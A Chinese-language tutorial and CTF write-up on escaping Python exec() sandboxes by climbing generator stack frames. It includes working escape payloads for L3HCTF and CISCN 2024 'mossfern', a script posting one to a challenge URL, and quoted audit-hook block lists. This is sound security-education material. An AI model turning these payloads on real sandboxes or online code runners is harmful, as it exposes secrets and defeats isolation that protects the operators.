python利用栈帧进行沙箱逃逸 copy copy copy!
生成器 生成器(Generator)是 Python 中一种特殊的迭代器,生成器可以使用 yield 关键字来定义。
yield 用于产生一个值,并在保留当前状态的同时暂停函数的执行。当下一次调用生成器时,函数会从上次暂停的位置继续执行,直到遇到下一个 yield 语句或者函数结束
1 2 3 4 5 6 7 8 9 def f (): a=1 while True : yield a a+=1 f=f() print (next (f)) print (next (f)) print (next (f))
把while换成for定义一个有限的迭代器:
1 2 3 4 5 6 def f (): a=1 for i in range (100 ): yield a a+=1 f=f()
用循环能遍历迭代器:
1 2 for value in f: print (value)
利用生成器表达式能简洁地创建一个生成器,省略yield:
1 2 3 4 a=(i+1 for i in range (100 )) for value in a: print (value)
生成器的内置属性:
gi_code
: 生成器对应的code对象。
gi_frame
: 生成器对应的frame(栈帧)对象。
gi_running
: 生成器函数是否在执行。生成器函数在yield以后、执行yield的下一行代码前处于frozen状态,此时这个属性的值为0。
gi_yieldfrom
:如果生成器正在从另一个生成器中 yield 值,则为该生成器对象的引用;否则为 None。
gi_frame.f_locals
:一个字典,包含生成器当前帧的本地变量。
使用gi_frame
指向生成器或协程当前执行的帧对象(frame object),如果这个生成器或协程正在执行的话。帧对象表示代码执行的当前上下文,包含了局部变量、执行的字节码指令等信息。
每当 Python 解释器执行一个函数或方法时,都会创建一个新的栈帧,用于存储该函数或方法的局部变量、参数、返回地址以及其他执行相关的信息。这些栈帧会按照调用顺序被组织成一个栈,称为调用栈。
比如使用gi_frame
搭配以下栈帧属性就能获取一些内置变量
f_locals
: 一个字典,包含了函数或方法的局部变量。键是变量名,值是变量的值。
f_globals
: 一个字典,包含了函数或方法所在模块的全局变量。键是全局变量名,值是变量的值。
f_code
: 一个代码对象(code object),包含了函数或方法的字节码指令、常量、变量名等信息。
f_lasti
: 整数,表示最后执行的字节码指令的索引。
f_back
: 指向上一级调用栈帧的引用,用于构建调用栈。
利用栈帧和f_back沙箱逃逸 example1:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 s3cret="this is flag" codes=''' def waff(): def f(): yield g.gi_frame.f_back g = f() #生成器 frame = next(g) #获取到生成器的栈帧对象 b = frame.f_back.f_back.f_globals['s3cret'] #返回并获取前一级栈帧的globals return b b=waff() ''' locals ={}code = compile (codes, "test" , "exec" ) exec (code,locals )print (locals ["b" ])
通过生成器的栈帧对象通过f_back(返回前一帧)从而逃逸出去获取globals全局符号表,运行得到 this is flag
,成功逃逸出沙箱获取到s3cret
变量值
next(g)
调用生成器 g
的 __next__()
方法,使其开始执行,直至遇到 yield
。这里获取到的就是g.gi_frame.f_back
。locals是沙箱变量值
但是下面这个example2就报错,为什么?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 s3cret="this is flag" codes=''' def waff(): def f(): yield g.gi_frame g = f() #生成器 frame = next(g) #获取到生成器的栈帧对象 b = frame.f_back.f_back.f_back.f_globals['s3cret'] #返回并获取前一级栈帧的globals return b b=waff() ''' locals ={}code = compile (codes, "test" , "exec" ) exec (code,locals )print (locals ["b" ])
example1中:
g.gi_frame.f_back
指向waff栈帧,frame.f_back
指向exec test沙箱栈帧,frame.f_back.f_back
指向主函数栈帧
example2中:
g.gi_frame
指向f栈帧,退出f后该栈帧销毁,所以后续为None
so,以下代码也能执行,只要保证frame存在
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 s3cret="this is flag" codes=''' def waff(): def f(): yield g.gi_frame.f_back.f_back.f_back g = f() #生成器 frame = next(g) #获取到生成器的栈帧对象 b = frame.f_globals['s3cret'] #返回并获取前一级栈帧的globals return b b=waff() ''' locals ={}code = compile (codes, "test" , "exec" ) exec (code,locals )print (locals ["b" ])
这里s3cret字符串是全局变量的同时也是整个作用域的局部变量,因此也能用f_locals['s3cret']
去获得
获取了globals后,可以进一步获取__builtins__
模块,__builtins__
模块是 Python 解释器启动时自动加载的,其中包含了一系列内置函数、异常和其他内置对象。
例题 L3HCTF 源码如下,codes来自传参,注释已贴:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import sysimport oscodes=''' <<codehere>> ''' try : codes.encode("ascii" ) except UnicodeEncodeError: exit(0 ) if "__" in codes: print ("__ bypass!!" ) exit(0 ) codes+="\nres=factorization(c)" print (codes)locals ={"c" :"696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863" ,"__builtins__" : None }res=set () def blackFunc (oldexit ): def func (event, args ): blackList = ["process" ,"os" ,"sys" ,"interpreter" ,"cpython" ,"open" ,"compile" ,"__new__" ,"gc" ] for i in blackList: if i in (event + "" .join(str (s) for s in args)).lower(): print ("noooooooooo" ) print (i) oldexit(0 ) return func code = compile (codes, "<judgecode>" , "exec" ) sys.addaudithook(blackFunc(os._exit)) exec (code,{"__builtins__" : None },locals )print (locals )p=int (locals ["res" ][0 ]) q=int (locals ["res" ][1 ]) if (p>1e5 and q>1e5 and p*q==int ("696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863" )): print ("Correct!" ,end="" ) else : print ("Wrong!" ,end="" )
沙盒内置空了__builtins__
,阻断了后续利用;且过滤了几个敏感关键字,不能用gc垃圾回收器去获取对象引用,也不能直接调os
我们传如下code先获取到沙箱外的globals:
1 2 3 a=(a.gi_frame.f_back.f_back for i in [1 ]) a=[x for x in a][0 ] globals =a.f_back.f_back.f_globals
为什么要用[x for x in a][0]
?
因为本来是用next获取g.gi_frame.f_back
的,但是next也属于builtins,一起被ban了,所以用for去获取(for in
其实也是遍历迭代器)
题目要求5s完成质数分解(官方给出的factorization),完全分不了
利用"_"*2+"builtins"+"_"*2
绕过对__
的过滤
这里提一嘴,之前打华为杯awdp的时候,有个过滤os的利用 "o"+"s"
绕过
过滤了沙箱内的__builtins__
没过滤沙箱外的,所以先退回沙箱外栈帧再获取builtins
所以直接通过沙箱外globals.__builtins__
修改int函数返回固定的p*q结果
1 2 3 4 5 6 def fake_int (i ): return 100001 * 100002 a=(a.gi_frame.f_back.f_back for i in [1 ]) a=[x for x in a][0 ] builtin =a.f_back.f_back.f_globals["_" *2 +"builtins" +"_" *2 ] builtin.int =fake_int
2024ciscn mossfern 在线执行代码?
附件给了两个源码,同理我把注释贴代码里方便阅读
main.py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 import osimport subprocessfrom flask import Flask, request, jsonifyfrom uuid import uuid1app = Flask(__name__) runner = open ("/app/runner.py" , "r" , encoding="UTF-8" ).read() flag = open ("/flag" , "r" , encoding="UTF-8" ).readline().strip() @app.post("/run" ) def run (): id = str (uuid1()) try : data = request.json open (f"/app/uploads/{id } .py" , "w" , encoding="UTF-8" ).write( runner.replace("THIS_IS_SEED" , flag).replace("THIS_IS_TASK_RANDOM_ID" , id )) open (f"/app/uploads/{id } .txt" , "w" , encoding="UTF-8" ).write(data.get("code" , "" )) run = subprocess.run( ['python' , f"/app/uploads/{id } .py" ], stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=3 ) result = run.stdout.decode("utf-8" ) error = run.stderr.decode("utf-8" ) print (result, error) if os.path.exists(f"/app/uploads/{id } .py" ): os.remove(f"/app/uploads/{id } .py" ) if os.path.exists(f"/app/uploads/{id } .txt" ): os.remove(f"/app/uploads/{id } .txt" ) return jsonify({ "result" : f"{result} \n{error} " }) except : if os.path.exists(f"/app/uploads/{id } .py" ): os.remove(f"/app/uploads/{id } .py" ) if os.path.exists(f"/app/uploads/{id } .txt" ): os.remove(f"/app/uploads/{id } .txt" ) return jsonify({ "result" : "None" }) if __name__ == "__main__" : app.run("0.0.0.0" , 5000 )
runner.py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 def source_simple_check (source ): """ Check the source with pure string in string, prevent dangerous strings :param source: source code :return: None """ from sys import exit from builtins import print try : source.encode("ascii" ) except UnicodeEncodeError: print ("non-ascii is not permitted" ) exit() for i in ["__" , "getattr" , "exit" ]: if i in source.lower(): print (i) exit() def block_wrapper (): """ Check the run process with sys.audithook, no dangerous operations should be conduct :return: None """ def audit (event, args ): from builtins import str , print import os for i in ["marshal" , "__new__" , "process" , "os" , "sys" , "interpreter" , "cpython" , "open" , "compile" , "gc" ]: if i in (event + "" .join(str (s) for s in args)).lower(): print (i) os._exit(1 ) return audit def source_opcode_checker (code ): """ Check the source in the bytecode aspect, no methods and globals should be load :param code: source code :return: None """ from dis import dis from builtins import str from io import StringIO from sys import exit opcodeIO = StringIO() dis(code, file=opcodeIO) opcode = opcodeIO.getvalue().split("\n" ) opcodeIO.close() for line in opcode: if any (x in str (line) for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ]): if any (x in str (line) for x in ["randint" , "randrange" , "print" , "seed" ]): break print ("" .join([x for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ] if x in str (line)])) exit() if __name__ == "__main__" : from builtins import open from sys import addaudithook from contextlib import redirect_stdout from random import randint, randrange, seed from io import StringIO from random import seed from time import time source = open (f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt" , "r" ).read() source_simple_check(source) source_opcode_checker(source) code = compile (source, "<sandbox>" , "exec" ) addaudithook(block_wrapper()) outputIO = StringIO() with redirect_stdout(outputIO): seed(str (time()) + "THIS_IS_SEED" + str (time())) exec (code, { "__builtins__" : None , "randint" : randint, "randrange" : randrange, "seed" : seed, "print" : print }, None ) output = outputIO.getvalue() if "THIS_IS_SEED" in output: print ("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!" ) print ("bad code-operation why still happened ah?" ) else : print (output)
代码流程也很简单:
把runner.py的占位符THIS_IS_SEED换为flag,THIS_IS_TASK_RANDOM_ID换为id,保存为{id}.py
。
run路由接收json参数,key=code对应的value作为代码保存到{id}.txt
,然后用{id}.py
去运行{id}.txt
flag在runner.py里就是THIS_IS_SEED
替换的字符串,虽然flag是主进程定义的变量,沙箱逃逸不能从子进程越到主进程;但是经过替换已经导入到了runner.py进程
然后思考一下需要f_back多少层,画个栈图如下:
所以三层能退回主函数
怎么获取已定义的flag变量?
在 Python 中,**co_consts
** 是编译后代码对象(code object
)的一个属性。它包含了 字节码中定义的所有常量 。
最后如果flag在输出里,会直接被过滤
用print的end参数,逗号分割就完了
脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import requestsurl = 'http://8e890316-d92c-4777-88d8-0cc1bddb35a3.challenge.ctf.show/run' data = { "code" : ''' def exp(): def scq(): yield scq.gi_frame.f_back scq = scq() frame = [x for x in scq][0] gattr = frame.f_back.f_back.f_back.f_globals['_'+'_builtins_'+'_']# jail s = gattr.str for i in s(frame.f_back.f_back.f_back.f_code.co_consts): print(i, end = ",") exp() ''' } response = requests.post(url, json=data) print (response.json())
本地不知道什么原因一样的payload跑不出